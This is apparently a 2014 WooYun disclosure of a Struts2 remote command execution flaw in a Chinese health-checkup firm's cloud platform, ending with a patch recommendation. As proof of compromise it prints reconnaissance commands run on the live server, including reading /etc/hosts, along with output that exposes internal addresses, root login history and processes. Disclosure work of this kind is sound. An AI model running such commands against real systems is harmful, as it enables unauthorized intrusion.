当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074384

漏洞标题:慈铭体检集团云健康管理平台远程命令执行漏洞

相关厂商:慈铭体检集团

漏洞作者: 猪猪侠

提交时间:2014-08-29 20:32

修复时间:2014-10-13 20:34

公开时间:2014-10-13 20:34

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-08-29: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-10-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

慈铭体检集团云健康管理平台 远程命令执行漏洞
现在连体检公司居然都用上云了。。。

详细说明:

# 漏洞网站
http://health.ciming.com/loginMessage.action

ciming.jpg


漏洞证明:

ciming2.jpg


>whoami
gpmsuser
>ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:50:56:83:57:6D  
          inet addr:10.10.12.41  Bcast:10.10.12.255  Mask:255.255.255.0
          inet6 addr: fe80::250:56ff:fe83:576d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:32863746 errors:0 dropped:0 overruns:0 frame:0
          TX packets:96947840 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:7805494566 (7.2 GiB)  TX bytes:59550582633 (55.4 GiB)
lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:502 errors:0 dropped:0 overruns:0 frame:0
          TX packets:502 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:29960 (29.2 KiB)  TX bytes:29960 (29.2 KiB)
>cat /etc/hosts
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
10.10.12.41	GaiRuiApp01
58.247.75.246     api.ykservice.com
10.2.201.41 www.wincome.org
10.2.201.41 pns.gareahealth.com
>last -10
root     pts/1        10.1.6.50        Wed Aug 27 10:10 - 10:41  (00:30)    
root     pts/1        10.1.6.50        Wed Aug 27 09:25 - 09:54  (00:29)    
root     pts/1        10.1.6.50        Mon Aug 25 16:45 - 19:03  (02:18)    
root     pts/1        10.1.6.50        Mon Aug 25 10:57 - 11:00  (00:02)    
root     pts/1        10.1.6.50        Mon Aug 25 08:16 - 08:22  (00:06)    
root     pts/1        10.1.6.50        Fri Aug 15 17:00 - 17:07  (00:07)    
root     pts/1        10.1.6.50        Fri Aug 15 15:53 - 16:45  (00:51)    
root     pts/1        10.1.6.50        Fri Aug 15 15:24 - 15:28  (00:03)    
root     pts/1        10.1.6.50        Fri Aug 15 08:25 - 08:26  (00:01)    
root     pts/0        10.10.10.22      Tue Aug 12 09:08   still logged in   
wtmp begins Thu Jun 26 21:04:55 2014
>ps -ef
UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 Jul30 ?        00:00:02 /sbin/init
root         2     0  0 Jul30 ?        00:00:00 [kthreadd]
root         3     2  0 Jul30 ?        00:00:00 [migration/0]
root         4     2  0 Jul30 ?        00:00:35 [ksoftirqd/0]
root         5     2  0 Jul30 ?        00:00:00 [migration/0]
root         6     2  0 Jul30 ?        00:00:04 [watchdog/0]
root         7     2  0 Jul30 ?        00:00:00 [migration/1]
root         8     2  0 Jul30 ?        00:00:00 [migration/1]
root         9     2  0 Jul30 ?        00:00:28 [ksoftirqd/1]
root        10     2  0 Jul30 ?        00:00:03 [watchdog/1]
root        11     2  0 Jul30 ?        00:01:47 [events/0]
root        12     2  0 Jul30 ?        00:02:36 [events/1]
root        13     2  0 Jul30 ?        00:00:00 [cgroup]
root        14     2  0 Jul30 ?        00:00:00 [khelper]
root        15     2  0 Jul30 ?        00:00:00 [netns]
root        16     2  0 Jul30 ?        00:00:00 [async/mgr]
root        17     2  0 Jul30 ?        00:00:00 [pm]
root        18     2  0 Jul30 ?        00:00:11 [sync_supers]
root        19     2  0 Jul30 ?        00:00:13 [bdi-default]
root        20     2  0 Jul30 ?        00:00:00 [kintegrityd/0]
root        21     2  0 Jul30 ?        00:00:00 [kintegrityd/1]
root        22     2  0 Jul30 ?        00:00:15 [kblockd/0]
root        23     2  0 Jul30 ?        00:00:13 [kblockd/1]
root        24     2  0 Jul30 ?        00:00:00 [kacpid]
root        25     2  0 Jul30 ?        00:00:00 [kacpi_notify]
root        26     2  0 Jul30 ?        00:00:00 [kacpi_hotplug]
root        27     2  0 Jul30 ?        00:16:26 [ata/0]
root        28     2  0 Jul30 ?        00:04:40 [ata/1]
root        29     2  0 Jul30 ?        00:00:00 [ata_aux]
root        30     2  0 Jul30 ?        00:00:00 [ksuspend_usbd]
root        31     2  0 Jul30 ?        00:00:00 [khubd]
root        32     2  0 Jul30 ?        00:00:00 [kseriod]
root        33     2  0 Jul30 ?        00:00:00 [md/0]
root        34     2  0 Jul30 ?        00:00:00 [md/1]
root        35     2  0 Jul30 ?        00:00:00 [md_misc/0]
root        36     2  0 Jul30 ?        00:00:00 [md_misc/1]
root        37     2  0 Jul30 ?        00:00:02 [khungtaskd]
root        38     2  0 Jul30 ?        00:00:21 [kswapd0]
root        39     2  0 Jul30 ?        00:00:00 [ksmd]
root        40     2  0 Jul30 ?        00:00:36 [khugepaged]
root        41     2  0 Jul30 ?        00:00:00 [aio/0]
root        42     2  0 Jul30 ?        00:00:00 [aio/1]
root        43     2  0 Jul30 ?        00:00:00 [crypto/0]
root        44     2  0 Jul30 ?        00:00:00 [crypto/1]
root        49     2  0 Jul30 ?        00:00:00 [kthrotld/0]
root        50     2  0 Jul30 ?        00:00:00 [kthrotld/1]
root        51     2  0 Jul30 ?        00:00:00 [pciehpd]
root        53     2  0 Jul30 ?        00:00:00 [kpsmoused]
root        54     2  0 Jul30 ?        00:00:00 [usbhid_resumer]
root        83     2  0 Jul30 ?        00:00:00 [kstriped]
root       246     2  0 Jul30 ?        00:00:00 [scsi_eh_0]
root       247     2  0 Jul30 ?        00:15:05 [scsi_eh_1]
root       320     2  0 Jul30 ?        00:00:00 [scsi_eh_2]
root       321     2  0 Jul30 ?        00:00:00 [vmw_pvscsi_wq_2]
root       365     2  0 Jul30 ?        00:01:17 [jbd2/sda1-8]
root       366     2  0 Jul30 ?        00:00:00 [ext4-dio-unwrit]
root       367     2  0 Jul30 ?        00:00:00 [ext4-dio-unwrit]
root       447     1  0 Jul30 ?        00:00:00 /sbin/udevd -d
root       450     2  0 Jul30 ?        00:00:59 [flush-8:0]
root       604     2  0 Jul30 ?        00:00:40 [vmmemctl]
root       959     2  0 Jul30 ?        00:00:00 [kauditd]
root      1172     1  0 Jul30 ?        00:37:45 /usr/sbin/vmtoolsd
root      1343     1  0 Jul30 ?        00:00:03 auditd
root      1368     1  0 Jul30 ?        00:00:01 /sbin/rsyslogd -i /var/run/syslogd.pid -c 5
rpc       1386     1  0 Jul30 ?        00:00:04 rpcbind
dbus      1401     1  0 Jul30 ?        00:00:00 dbus-daemon --system
avahi     1413     1  0 Jul30 ?        00:00:02

修复方案:

# 及时补丁
It is strongly recommended to upgrade to Struts 2.3.15.1, which contains the corrected Struts2-Core library.
http://struts.apache.org/release/2.3.x/docs/s2-016.html
http://struts.apache.org/release/2.3.x/docs/s2-017.html

版权声明:转载请注明来源 猪猪侠@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)